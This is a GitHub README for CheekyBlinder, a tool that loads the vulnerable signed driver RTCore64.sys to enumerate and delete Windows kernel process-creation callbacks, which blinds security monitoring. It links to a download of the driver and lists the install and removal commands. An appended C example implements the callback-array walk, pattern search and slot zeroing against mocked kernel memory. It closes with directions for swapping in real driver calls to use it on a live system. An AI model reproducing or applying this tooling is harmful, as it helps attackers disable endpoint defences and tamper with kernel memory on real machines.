S1ckB0y1337 / CheekyBlinder

CheekyBlinder

Enumerating and removing kernel callbacks using signed vulnerable drivers

Accompanying blog post: https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/

WARNING: this program writes directly to kernel memory and can cause a BSOD; run it at your own risk, preferably in a VM.

Vulnerable driver can be downloaded from http://download-eu2.guru3d.com/afterburner/%5BGuru3D.com%5D-MSIAfterburnerSetup462Beta2.zip

Lots of code re-used from:

Build instructions

Builds with VS2019; build for x64 only (the driver and the offsets it relies on are 64-bit).

Usage instructions

Run elevated. Arguments and examples:

cheekyblinder.exe /process: lists the process-creation notification callbacks currently registered on the system

cheekyblinder.exe /delprocess <address>: removes the callback at <address> (use an address from the output of /process)

cheekyblinder.exe /installDriver: installs the driver RTCore64.sys (place it in the same folder as the executable; the driver must be loaded before /process or /delprocess will work)

cheekyblinder.exe /uninstallDriver: stops and removes the driver

To do

I'll add more callbacks when I have time.

Use the mimikatz-style pattern search to locate the callback array instead of hard-coded, version-specific offsets. PRs welcome.
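The two pieces of the technique above (walking the process notification callback array to list entries, and emptying a slot to remove one, plus the pattern search the to-do list asks for) are shown together below as an added example. This is not CheekyBlinder's code: the arbitrary read/write primitive a vulnerable driver such as RTCore64.sys provides is mocked with an in-memory buffer so the walk runs anywhere, and the fake kernel image, the 3-byte lea pattern, the array location and the two callback addresses are all constructed. What is real is the layout the walk depends on: the array has 64 pointer-sized slots, each non-zero slot holds a block pointer with a reference count in its low 4 bits (EX_FAST_REF), and the callback function pointer sits 8 bytes into that block.

```c
/* Added example, not CheekyBlinder's code. Simulates the kernel memory a
 * vulnerable driver's read/write primitive exposes, so the callback walk
 * can be run and tested off-box. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define KBASE 0xfffff80000000000ULL   /* constructed "ntoskrnl" base */
#define KSIZE 0x4000
#define MAX_PROC_CALLBACKS 64         /* slots in PspCreateProcessNotifyRoutine */
#define LEA_VA    (KBASE + 0x0100)    /* constructed: where the lea lives */
#define ARRAY_VA  (KBASE + 0x1000)    /* constructed: where the array lives */
#define CB_A_FUNC 0xfffff80012340000ULL /* constructed callback addresses */
#define CB_B_FUNC 0xfffff80056780000ULL

static uint8_t g_kmem[KSIZE];         /* constructed stand-in for kernel memory */

/* The two primitives the driver gives you, mocked: bounds-checked memcpy. */
static int kread(uint64_t va, void *out, size_t n) {
    if (va < KBASE || va + n > KBASE + KSIZE) return 0;
    memcpy(out, g_kmem + (va - KBASE), n);
    return 1;
}
static int kwrite(uint64_t va, const void *in, size_t n) {
    if (va < KBASE || va + n > KBASE + KSIZE) return 0;
    memcpy(g_kmem + (va - KBASE), in, n);
    return 1;
}
static uint64_t rd64(uint64_t va) { uint64_t v = 0; kread(va, &v, 8); return v; }
static void put64(uint64_t va, uint64_t v) { kwrite(va, &v, 8); }

/* Build the fake image: one RIP-relative lea that references the array,
 * and two EX_CALLBACK_ROUTINE_BLOCKs {RundownProtect, Function, Context}. */
void build_fake_kernel(void) {
    memset(g_kmem, 0, sizeof g_kmem);
    int32_t disp = (int32_t)(ARRAY_VA - (LEA_VA + 7));  /* lea rcx,[rip+disp32] */
    uint8_t lea[7] = {0x48, 0x8D, 0x0D};
    memcpy(lea + 3, &disp, 4);
    kwrite(LEA_VA, lea, 7);
    uint64_t blkA = KBASE + 0x2000, blkB = KBASE + 0x2020;
    put64(blkA + 8, CB_A_FUNC);
    put64(blkB + 8, CB_B_FUNC);
    /* Array slots: block pointer OR'd with a refcount in the low 4 bits. */
    put64(ARRAY_VA + 0 * 8, blkA | 0x3);
    put64(ARRAY_VA + 5 * 8, blkB | 0x1);
}

/* Pattern search: find the lea and resolve its RIP-relative target.
 * A real search needs a longer, version-checked pattern to avoid false hits. */
uint64_t find_callback_array(void) {
    static const uint8_t pat[3] = {0x48, 0x8D, 0x0D};
    for (uint64_t va = KBASE; va + 7 <= KBASE + KSIZE; va++) {
        uint8_t ins[7];
        if (!kread(va, ins, 7)) break;
        if (memcmp(ins, pat, 3) != 0) continue;
        int32_t disp; memcpy(&disp, ins + 3, 4);
        return va + 7 + (int64_t)disp;   /* target = next instruction + disp32 */
    }
    return 0;
}

typedef struct { int slot; uint64_t block; uint64_t function; } proc_cb_t;

/* /process: walk the 64 slots, mask off the EX_FAST_REF bits, read Function. */
int enumerate_process_callbacks(uint64_t array_va, proc_cb_t *out, int max) {
    int n = 0;
    for (int i = 0; i < MAX_PROC_CALLBACKS && n < max; i++) {
        uint64_t entry = rd64(array_va + 8ULL * i);
        if (entry == 0) continue;                 /* empty slot */
        uint64_t block = entry & ~0xFULL;         /* strip refcount bits */
        out[n].slot = i;
        out[n].block = block;
        out[n].function = rd64(block + 8);        /* EX_CALLBACK_ROUTINE_BLOCK.Function */
        n++;
    }
    return n;
}

/* /delprocess <address>: zero the slot whose block points at that function,
 * so the kernel skips it when it iterates the array. Returns 1 on success. */
int remove_process_callback(uint64_t array_va, uint64_t function) {
    proc_cb_t cbs[MAX_PROC_CALLBACKS];
    int n = enumerate_process_callbacks(array_va, cbs, MAX_PROC_CALLBACKS);
    for (int i = 0; i < n; i++) {
        if (cbs[i].function != function) continue;
        uint64_t zero = 0;
        return kwrite(array_va + 8ULL * cbs[i].slot, &zero, 8);
    }
    return 0;   /* not registered */
}

int main(void) {
    build_fake_kernel();
    uint64_t arr = find_callback_array();
    proc_cb_t cbs[MAX_PROC_CALLBACKS];
    int n = enumerate_process_callbacks(arr, cbs, MAX_PROC_CALLBACKS);
    printf("array at %llx, %d callbacks\n", (unsigned long long)arr, n);
    for (int i = 0; i < n; i++)
        printf("[%2d] block=%llx function=%llx\n", cbs[i].slot,
               (unsigned long long)cbs[i].block, (unsigned long long)cbs[i].function);
    remove_process_callback(arr, CB_A_FUNC);
    printf("after removal: %d callbacks\n",
           enumerate_process_callbacks(arr, cbs, MAX_PROC_CALLBACKS));
    return 0;
}
```

To turn this into something usable against a real box, replace kread/kwrite with DeviceIoControl calls to the loaded driver and replace the 3-byte pattern with the full version-specific byte sequence; the masking and the +8 dereference stay the same. Note that zeroing the slot leaves the callback block itself allocated and its rundown protection untouched, which is why the warning above about BSODs applies.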
